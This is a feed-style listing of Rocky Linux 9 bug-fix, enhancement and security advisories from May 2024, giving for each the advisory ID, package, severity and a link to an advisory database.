10.05.2024 17:34:28	rockylinux	[RLBA-2024:2359] cockpit-session-recording bug fix and enhancement update (none)	An update is available for cockpit-session-recording.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2359
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2367] tftp bug fix and enhancement update (none)	An update is available for tftp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2367
10.05.2024 17:34:28	rockylinux	[RLSA-2024:2366] freeglut security update (moderate)	An update is available for freeglut.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2366
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2370] synce4l bug fix and enhancement update (none)	An update is available for synce4l.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2370
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2372] sgpio bug fix and enhancement update (none)	An update is available for sgpio.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2372
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2381] rust-bootupd bug fix and enhancement update (none)	An update is available for rust-bootupd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2381
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2388] fuse-overlayfs bug fix and enhancement update (none)	An update is available for fuse-overlayfs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2388
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2390] ibus-anthy update (none)	An update is available for ibus-anthy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2390
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2547] sushi bug fix update (none)	An update is available for sushi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2547
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2555] gcc-toolset-12-gcc bug fix update (none)	An update is available for gcc-toolset-12-gcc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2555
10.05.2024 17:34:29	rockylinux	[RLSA-2024:2548] podman security and bug fix update (moderate)	An update is available for podman.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2548
10.05.2024 17:34:29	rockylinux	[RLSA-2024:2550] buildah bug fix update (moderate)	An update is available for buildah.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2550
10.05.2024 17:34:29	rockylinux	[RLSA-2024:2549] skopeo security and bug fix update (moderate)	An update is available for skopeo.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2549
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2553] bootc bug fix update (none)	An update is available for bootc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2553
10.05.2024 17:34:29	rockylinux	[RLBA-2024:2557] containers-common bug fix and enhancement update (none)	An update is available for containers-common.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2557
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2559] python-jwcrypto security update (moderate)	An update is available for python-jwcrypto.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2559
10.05.2024 17:34:30	rockylinux	[RLBA-2024:2563] nss bug fix update (none)	An update is available for nss.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2563
10.05.2024 17:34:30	rockylinux	[RLBA-2024:2567] aardvark-dns bug fix and enhancement update (none)	An update is available for aardvark-dns.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2567
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2564] mod_http2 security update (moderate)	An update is available for mod_http2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2564
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2562] golang security update (important)	An update is available for golang.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2562
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2565] libreswan security update (moderate)	An update is available for libreswan.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2565
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2566] pcp security, bug fix, and enhancement update (important)	An update is available for pcp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2566
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2568] grafana security update (moderate)	An update is available for grafana.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2568
10.05.2024 17:34:30	rockylinux	[RLSA-2024:2569] grafana-pcp security update (important)	An update is available for grafana-pcp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2569
10.05.2024 17:34:31	rockylinux	[RLSA-2024:2616] tigervnc security update (important)	An update is available for tigervnc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2616
10.05.2024 17:34:31	rockylinux	[RLSA-2024:2724] git-lfs security update (important)	An update is available for git-lfs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2724
10.05.2024 17:34:19	rockylinux	[RLBA-2023:6326] libstoragemgmt bug fix and enhancement update (none)	An update is available for libstoragemgmt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6326
10.05.2024 17:34:19	rockylinux	[RLBA-2023:6381] libwebp bug fix and enhancement update (none)	An update is available for libwebp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6381
10.05.2024 17:34:19	rockylinux	[RLEA-2023:6416] libblkio bug fix and enhancement update (none)	An update is available for libblkio.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2023:6416
10.05.2024 17:34:19	rockylinux	[RLSA-2023:6518] flatpak security, bug fix, and enhancement update (moderate)	An update is available for flatpak.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6518
10.05.2024 17:34:19	rockylinux	[RLBA-2023:6537] librelp bug fix and enhancement update (none)	An update is available for librelp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6537
10.05.2024 17:34:20	rockylinux	[RLSA-2024:0951] postgresql security update (important)	An update is available for postgresql.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:0951
10.05.2024 17:34:20	rockylinux	[RLBA-2024:1736] .NET 7.0 bugfix update (none)	An update is available for dotnet7.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1736
10.05.2024 17:34:20	rockylinux	[RLSA-2023:6551] yajl security update (moderate)	An update is available for yajl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6551
10.05.2024 17:34:20	rockylinux	[RLSA-2024:1691] varnish security update (important)	An update is available for varnish.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1691
10.05.2024 17:34:20	rockylinux	[RLSA-2024:1750] unbound security update (important)	An update is available for unbound.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1750
10.05.2024 17:34:20	rockylinux	[RLBA-2024:2152] poppler bug fix and enhancement update (none)	An update is available for poppler.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2152
10.05.2024 17:34:20	rockylinux	[RLBA-2024:2166] xdp-tools bug fix and enhancement update (none)	An update is available for xdp-tools.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2166
10.05.2024 17:34:20	rockylinux	[RLBA-2024:2200] virt-v2v bug fix and enhancement update (none)	An update is available for virt-v2v.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2200
10.05.2024 17:34:20	rockylinux	[RLBA-2024:2196] ibus bug fix and enhancement update (none)	An update is available for ibus-hangul, ibus.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2196
10.05.2024 17:34:20	rockylinux	[RLBA-2024:2235] ostree bug fix and enhancement update (none)	An update is available for ostree.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2235
10.05.2024 17:34:21	rockylinux	[RLBA-2024:2256] criu bug fix and enhancement update (none)	An update is available for criu.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2256
10.05.2024 17:34:21	rockylinux	[RLSA-2024:2264] edk2 security update (important)	An update is available for edk2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2264
10.05.2024 17:34:21	rockylinux	[RLBA-2024:2263] mesa bug fix and enhancement update (none)	An update is available for mesa.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2263
10.05.2024 17:34:21	rockylinux	[RLBA-2024:2268] anaconda bug fix and enhancement update (none)	An update is available for anaconda.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2268
10.05.2024 17:34:21	rockylinux	[RLEA-2024:2269] nbdkit enhancement and bugfix update (none)	An update is available for nbdkit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2269
10.05.2024 17:34:21	rockylinux	[RLSA-2024:2287] gstreamer1-plugins-bad-free security update (moderate)	An update is available for gstreamer1-plugins-bad-free.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2287
10.05.2024 17:34:21	rockylinux	[RLSA-2024:2295] libjpeg-turbo security update (moderate)	An update is available for libjpeg-turbo.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2295
10.05.2024 17:34:21	rockylinux	[RLBA-2024:2305] graphviz bug fix and enhancement update (none)	An update is available for graphviz.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2305
10.05.2024 17:34:21	rockylinux	[RLBA-2024:2327] PackageKit bug fix and enhancement update (none)	An update is available for PackageKit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2327
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2371] dovecot bug fix and enhancement update (none)	An update is available for dovecot.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2371
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2383] freeipmi bug fix and enhancement update (none)	An update is available for freeipmi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2383
10.05.2024 17:34:22	rockylinux	[RLEA-2024:2546] 389-ds-base enhancement update (none)	An update is available for 389-ds-base.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2546
10.05.2024 17:34:22	rockylinux	[RLSA-2024:2551] bind security update (important)	An update is available for bind-dyndb-ldap, bind.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2551
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2554] .NET 8.0 bug fix update (none)	An update is available for dotnet8.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2554
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2552] .NET 6.0 bug fix update (none)	An update is available for dotnet6.0.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2552
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2556] nmstate bug fix update (none)	An update is available for nmstate.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2556
10.05.2024 17:34:22	rockylinux	[RLBA-2024:2558] ipa bug fix update (none)	An update is available for ipa.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2558
10.05.2024 17:34:23	rockylinux	[RLBA-2024:2561] gnome-shell, gnome-menus, and gnome-shell-extensions bug fix update (none)	An update is available for gnome-menus, gnome-shell, gnome-shell-extensions.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2561
10.05.2024 17:34:23	rockylinux	[RLSA-2024:2560] libvirt security and bug fix update (moderate)	An update is available for libvirt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2560
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6590] ethtool bug fix and enhancement update (none)	An update is available for ethtool.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6590
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6611] lua bug fix and enhancement update (none)	An update is available for lua.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6611
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6673] kbd bug fix and enhancement update (none)	An update is available for kbd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6673
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6684] dbus bug fix and enhancement update (none)	An update is available for dbus.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6684
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6691] python-dateutil bug fix and enhancement update (none)	An update is available for python-dateutil.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6691
10.05.2024 17:34:15	rockylinux	[RLBA-2023:6700] findutils bug fix and enhancement update (none)	An update is available for findutils.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6700
10.05.2024 17:34:15	rockylinux	[RLEA-2023:7251] microcode_ctl bug fix and enhancement update (none)	An update is available for microcode_ctl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2023:7251
10.05.2024 17:34:15	rockylinux	[RLBA-2024:2397] cockpit bug fix and enhancement update (none)	An update is available for cockpit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2397
10.05.2024 17:34:15	rockylinux	[RLBA-2024:2402] selinux-policy bug fix and enhancement update (none)	An update is available for selinux-policy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2402
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2403] gcc bug fix and enhancement update (none)	An update is available for gcc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2403
10.05.2024 17:34:16	rockylinux	[RLEA-2024:2400] crypto-policies bug fix and enhancement update (none)	An update is available for crypto-policies.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2400
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2407] xfsdump bug fix and enhancement update (none)	An update is available for xfsdump.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2407
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2408] wireless-regdb bug fix and enhancement update (none)	An update is available for wireless-regdb.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2408
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2411] e2fsprogs bug fix and enhancement update (none)	An update is available for e2fsprogs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2411
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2412] python-urllib3 bug fix and enhancement update (none)	An update is available for python-urllib3.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2412
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2420] tuna bug fix and enhancement update (none)	An update is available for tuna.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2420
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2423] autofs bug fix and enhancement update (none)	An update is available for autofs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2423
10.05.2024 17:34:15	rockylinux	[RLSA-2024:1692] less security update (moderate)	An update is available for less.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1692
10.05.2024 17:34:16	rockylinux	[RLEA-2024:2421] python-configshell bug fix and enhancement update (none)	An update is available for python-configshell.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2421
10.05.2024 17:34:16	rockylinux	[RLEA-2024:2424] libnvme bug fix and enhancement update (none)	An update is available for libnvme.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2424
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2428] glib2 bug fix and enhancement update (none)	An update is available for glib2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2428
10.05.2024 17:34:16	rockylinux	[RLBA-2024:2429] rdma-core bug fix and enhancement update (none)	An update is available for rdma-core.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2429
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2427] elfutils bug fix and enhancement update (none)	An update is available for elfutils.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2427
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2439] libsemanage bug fix and enhancement update (none)	An update is available for libsemanage.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2439
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2434] dnf bug fix and enhancement update (none)	An update is available for dnf.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2434
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2440] libsepol bug fix and enhancement update (none)	An update is available for libsepol.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2440
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2451] numad bug fix and enhancement update (none)	An update is available for numad.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2451
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2452] acl bug fix and enhancement update (none)	An update is available for acl.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2452
10.05.2024 17:34:17	rockylinux	[RLSA-2024:2463] systemd security update (moderate)	An update is available for systemd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2463
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2468] libtalloc bug fix and enhancement update (none)	An update is available for libtalloc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2468
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2467] hwdata bug fix and enhancement update (none)	An update is available for hwdata.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2467
10.05.2024 17:34:17	rockylinux	[RLBA-2024:2464] xfsprogs bug fix and enhancement update (none)	An update is available for xfsprogs.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2464
